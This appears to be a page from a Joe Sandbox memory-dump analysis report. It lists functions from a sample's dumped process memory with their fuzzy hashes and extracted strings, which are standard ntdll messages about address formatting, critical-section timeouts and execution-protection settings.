Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
Instruction ID: 55bdca43bca2d0c64cf24bfaaaa83463ced2411703e6abd86146173700461b66
Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
Instruction Fuzzy Hash: 15E0D8323407002BD7128E59CDD0F47776EEFE2B10F01007AB9045F651CAE2DC09C6A4

Function 22AAC5ED Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cd5e8a3915ca121472dcf26dd317ebb39ef102caded420053d5910ef62a56b3
Instruction ID: f7907ce07f804f5da60ddb4a313a39c72136b04ee9285f6909a30766a91d7ba1
Opcode Fuzzy Hash: 6cd5e8a3915ca121472dcf26dd317ebb39ef102caded420053d5910ef62a56b3
Instruction Fuzzy Hash: 39F0ECB19127909FF312CB1CC3E4B02B3FABF047A8F04B666D50587E22C660C880CA51

Function 22B06030 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Instruction ID: 322bdc44dd6be208db8899cfd3fe04406e0a1acc7f55642c04955c5c36e56d42
Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Instruction Fuzzy Hash: 0DF030726843149FE311CF15D980F42BBE9EB15364F42C025E6089B561E37AED40CBA4

Function 22A70710 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction ID: 4f54c9f82aa06d9396fc250cf021ffc1690297dc6420481bef2c2902080ab8c6
Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction Fuzzy Hash: 21F0E539204B80DBD706CF15D140A99BBF8FB45350B004054F8458B701E731E981CB85

Function 22AA49D0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction ID: e0953a6797ca85857176f6f22d3888e1717a606baff51784bff5dccf3b36b99c
Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction Fuzzy Hash: 27E09232344344AFC3611A558910F567BB6AFD07A0F120429FA029B950DB70DC40E798

Function 22B1678E Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
Instruction ID: aa4b1846fa9303a83a5587f1b9e5204d755506398534a009960afb7808ac2290
Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
Instruction Fuzzy Hash: 33E0DF32A42310BBDB218BA98E01F9A7ABCDF90FA4F010055BA00E70A0E530DE00C690

Function 22B2A456 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
Instruction ID: 291cca9423cb87d85e1f49d0b5cc0a9d9c0d1beac203289035939f7d508fa289
Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
Instruction Fuzzy Hash: 88E09231150B10DFE7329F22CF08B52B7E1EF50B55F148C2DA1AA018B0C7B8D8C0CA40

Function 22A725E0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: be534dba804e2749d9153a751455737e881c5e8ee6d0b8cad8e420b1972a0801
Instruction ID: 46b7f56781957fc1f5bd830b973f18bc4d1483e2b50933fe62eb92e603ba1eae
Opcode Fuzzy Hash: be534dba804e2749d9153a751455737e881c5e8ee6d0b8cad8e420b1972a0801
Instruction Fuzzy Hash: 35E092722407549BC712AF29DE01F9AB7AAEF60360F014515B11557590CA74AC50C788

Function 22AF4000 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction ID: 9ebfabbd29665040d45f44a0c168ed70547fdc9c2f73b848aa48bc2f805636e7
Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction Fuzzy Hash: A0E0C2343003058FD705CF19C180B6277B6BFD5A14F24C078AA488FA05EB3BE942CB40

Function 22AACA38 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b0e5ff2c2ca153ab617deece69aeba456a1e2cd77496eeea578d72d833641db
Instruction ID: 311819a36065a96fa3f945dd2a5324b23d6b879826993b4ce1abaad28397cc88
Opcode Fuzzy Hash: 7b0e5ff2c2ca153ab617deece69aeba456a1e2cd77496eeea578d72d833641db
Instruction Fuzzy Hash: 11D02B335C53206AD764D115BD54FA33AABAF54760F024870F60993810D524CC81C6C0

Function 22A6823B Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
Instruction ID: c04c97fb4b0eb42760fcc6b4d9f3689764be0dcfac3038d8f54a854c9ea0acae
Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
Instruction Fuzzy Hash: 4FE08C31281B10EFDB311E31DE00F62B6A9FF68B10F10492AE1811ACA48BB1AC89CE44

Function 22A72050 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ea5d7e4d5aa8a21933359e848474092e553a48ce06a621ad9649b476054942f
Instruction ID: 63cd3bf3e6e4982ddac8ca9d5af1d5930f6ca1d8e4896c38851dc09d5ac61936
Opcode Fuzzy Hash: 4ea5d7e4d5aa8a21933359e848474092e553a48ce06a621ad9649b476054942f
Instruction Fuzzy Hash: C0E0C2732807506BC311EF6DDE00F9E73AEEFA43A0F004121F1508BAD0CA64AC40C798

Function 22AA8A90 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
Instruction ID: 127aeeadd4b2b364e6f033c630d52347792edba130084b09a918d42fedee535e
Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
Instruction Fuzzy Hash: 1CE08633111B148BC715EE54D521B6277F4FF45720F05463EA61747780C534E944C7D4

Function 22AC6AA4 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
Instruction ID: a1bfa2d53b88191df3d197123604645fac6d9187198137874b795db145d6177f
Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
Instruction Fuzzy Hash: 4CD05E76511B50AFC3328F1BEA00C13BBF9FBC4F10705066EA54683D20C671A846CBA0

Function 22AAE59C Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction ID: 26da922b6f7f48d025d1ba817b654382496c88fae44f97435d8509482d3d023f
Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction Fuzzy Hash: 58D0A972A44720ABD7329A1CFD00FC373E9BB88720F060469B009CB550C360AC82CA84

Function 22AEE908 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
Instruction ID: 86a028c311ba7213cfa7f46955a0a6586f6cec213ff0eb62daff84f8f7bfbe01
Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
Instruction Fuzzy Hash: 98E0EC75A507849BCF12DF59D780F5EB7F9BBA4B54F150054A1095FA60C624A901CB40

Function 22A6A0E3 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction ID: cb48a8b1b2f522f4d849c8e057d8558b627f1c7c945fce8eca0505f3c3566974
Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction Fuzzy Hash: 11D0223231223093CF1886506A00F737A05AB80A98F06002C790A93C00C6088CC2C2E0

Function 22AACA24 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4000ca2ea61a8053215a6a5b5494adb927155a0f54c00de2ec7510a81b4adfa7
Instruction ID: ad4f93fa2073fea1abb6bfce5c39b2c2cfc9a74dd9e1de8b1ef75d5f15b61dc2
Opcode Fuzzy Hash: 4000ca2ea61a8053215a6a5b5494adb927155a0f54c00de2ec7510a81b4adfa7
Instruction Fuzzy Hash: 88D09E756957419FDF06CF54C664E7A7676FF14644B800078E70656920D329D902C650

Function 22AAA830 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
Instruction ID: ee881db943395c90a8c8997d35b23c7e964b6938633b417ce644314b11d63fb0
Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
Instruction Fuzzy Hash: 63D012771D064CBBCB119F65DD01F957BA9E764BA0F444020B6048B5A0C63AE990D584

Function 22AAC700 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction ID: 2151abd85524590d16e2bec0e713a44bb2b145aaf2027c1fc15399e70435ff2a
Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction Fuzzy Hash: D7C08C73290748AFC712DF98CE01F027BA9EBA8B40F000021F3048BA70C631FC60EA84

Function 22A90310 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: 12287a0203856fbf92cc5296637f47620953da075aab15137f33391b644b7897
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: 22D01236240348EFCB01DF41C990D9A776AFBD8750F509019FD19076108A31ED62DA50

Function 22A70750 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction ID: 7cb394dae07a7f55a51e183b651f935836baf645325805f57e20c8a1f7d5da8a
Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction Fuzzy Hash: 6AC00179741B418BCF06CA2AD394B4977E4BB44740F164890E8058BA22E624E901CA11

Function 22AB2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 22AB293C
___swprintf_l.LIBCMT ref: 22AB295E
___swprintf_l.LIBCMT ref: 22AB29A3
___swprintf_l.LIBCMT ref: 22AEA52E

Strings

ffff:, xrefs: 22AEA504
:%u.%u.%u.%u, xrefs: 22AEA5B8
::ffff:0:%u.%u.%u.%u, xrefs: 22AEA54E
::%hs%u.%u.%u.%u, xrefs: 22AEA527

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: fc1c61673d8e46f6c7ca043044018f8475ad529d0c53f1c47cb873b57c4b5046
Instruction ID: 10aa6e105f329d5fd334a4009b0d6d886964f92523cb09f1df5704685dbe1ed0
Opcode Fuzzy Hash: fc1c61673d8e46f6c7ca043044018f8475ad529d0c53f1c47cb873b57c4b5046
Instruction Fuzzy Hash: 2A51C8B6A00316AFDB10DB9889D097EF7BCBF58300B10826AE469D7A46D774DE51C7E0

Function 22B22410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 22B224A6
___swprintf_l.LIBCMT ref: 22B224E2
___swprintf_l.LIBCMT ref: 22B2257D
___swprintf_l.LIBCMT ref: 22B225A3
___swprintf_l.LIBCMT ref: 22B225C8
___swprintf_l.LIBCMT ref: 22B22608

Strings

::%hs%u.%u.%u.%u, xrefs: 22B2249E
ffff:, xrefs: 22B2247D, 22B2249D
::ffff:0:%u.%u.%u.%u, xrefs: 22B224DA
:%u.%u.%u.%u, xrefs: 22B225FF

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 77b07afb1335dd3bbaa4ddd5fc50e072510a4b8d15ea998debddcf71ae527b39
Instruction ID: 0a0bcdaba15de9459e6f0427d5c7e48f01cebaf2a786df29d7c469f86f02fbda
Opcode Fuzzy Hash: 77b07afb1335dd3bbaa4ddd5fc50e072510a4b8d15ea998debddcf71ae527b39
Instruction Fuzzy Hash: 9E51C575E00B45AFDB20CE98CAA097FB7FDEF48200B44C659E5A9D7642E6B4DB40C760

Function 22AA7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 22AE4742
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 22AE46FC
Execute=1, xrefs: 22AE4713
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 22AE4725
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 22AE4655
CLIENT(ntdll): Processing section info %ws..., xrefs: 22AE4787
ExecuteOptions, xrefs: 22AE46A0

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: de6241939210fabd5c1aa531f73c3e153868962dd515023024729f0c7b27db22
Instruction ID: a9be8106a1ab4b574fc4f484338ed0d8d03ce5dd9de72e8acbe05016d966f78e
Opcode Fuzzy Hash: de6241939210fabd5c1aa531f73c3e153868962dd515023024729f0c7b27db22
Instruction Fuzzy Hash: 3851D631B40319AAEB11DBA8DDB5FEF77B8BF18304F0001A9E605A7991EB719A45CB50

Function 22ABB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 22ABB6BF

Strings

+, xrefs: 22ABB65A
0, xrefs: 22ABB66F
-, xrefs: 22ABB650
0, xrefs: 22ABB695

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 21978377a5ee8fa3c68c98538d52d221cdc4d0b807c3c7348953a1820bcf7bf9
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 1A81C270E473498EDF04CFA8CAA1BEEBBA9BF65354F144A19DC51A7E91C7348980CB50

Function 22B220E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 22B2214F
___swprintf_l.LIBCMT ref: 22B22172

Strings

]:%u, xrefs: 22B22169
[, xrefs: 22B2212B
%%%u, xrefs: 22B22146

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 08af0b55f7a79ac945a5b8a36a1acc1c5785c4e29ca85d3e948c9820747a10bb
Instruction ID: dce141f249234f45ba5c7577b8bb6643baaa98fc8106c720cd7d285eda59650c
Opcode Fuzzy Hash: 08af0b55f7a79ac945a5b8a36a1acc1c5785c4e29ca85d3e948c9820747a10bb
Instruction Fuzzy Hash: A3215176E00729ABDB10DE69CD40EFE77F8EF54755F440226EA09E7200E7709A418BA1

Function 22A9F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 22AE031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 22AE02E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 22AE02BD

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: cce85d1794bbe531064084c04da3af357ab4bcbec0cddb17092c83f5aecd0238
Instruction ID: db588b79cede0cc79081215ad2cfc57ec290403e7b7cc238dda497eaf0ed3615
Opcode Fuzzy Hash: cce85d1794bbe531064084c04da3af357ab4bcbec0cddb17092c83f5aecd0238
Instruction Fuzzy Hash: 73E1AC30608741DFD711CF29CA81B1AB7E0BF84318F104A69FAA9DBAE1DB75D945CB42

Function 22AABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 22AE7B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 22AE7B7F
RTL: Re-Waiting, xrefs: 22AE7BAC

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: ae441593553b2a7f670c5340d00b925643772b48438677030045af4eef8ca3ca
Instruction ID: ad525f334aaec81654417db025a9d3ecd226ac2baee518b593c823da3a2a5ece
Opcode Fuzzy Hash: ae441593553b2a7f670c5340d00b925643772b48438677030045af4eef8ca3ca
Instruction Fuzzy Hash: 2041B0317017429FD724CE25CE90B5AB7E5FFA8710F100A2EFA5A97A80DB31E905CB91

Function 22AAB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22AE728C

Strings

RTL: Resource at %p, xrefs: 22AE72A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 22AE7294
RTL: Re-Waiting, xrefs: 22AE72C1

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: c761296816df6b3c1f80a9c8329df108209df4c7f765052872e634082f8fc8e1
Instruction ID: c0016ad7bad5a78198dac9a6d194ff9daa08e5a6897d5ac280c2c418099e54dd
Opcode Fuzzy Hash: c761296816df6b3c1f80a9c8329df108209df4c7f765052872e634082f8fc8e1
Instruction Fuzzy Hash: BB41D031701342ABD711CE25CD81FA6BBA5FF64714F100A29FA5AEBA80DB31E856C7D1

Function 22B22300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 22B2238D
___swprintf_l.LIBCMT ref: 22B223B3

Strings

%%%u, xrefs: 22B22384
]:%u, xrefs: 22B223AA

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 0004421711480e59e2c973407b246b023d30bc7357bb890b95e99adc41e71be4
Instruction ID: 21005cff88c7a5b5b52a414c476e6159f4aecf30373921592355985f7421229d
Opcode Fuzzy Hash: 0004421711480e59e2c973407b246b023d30bc7357bb890b95e99adc41e71be4
Instruction Fuzzy Hash: 9C316472A007199FDB10CE29CE40BEE77F8EF54654F844556E94DE3240EB70AA458BA0

Function 22AB7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 22AB7E8B

Strings

+, xrefs: 22AB7DE8
-, xrefs: 22AB7DDD

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 2c0663d4a1a2ba9750daba0692475cadb74236f43837732a757b4e9aadfdd125
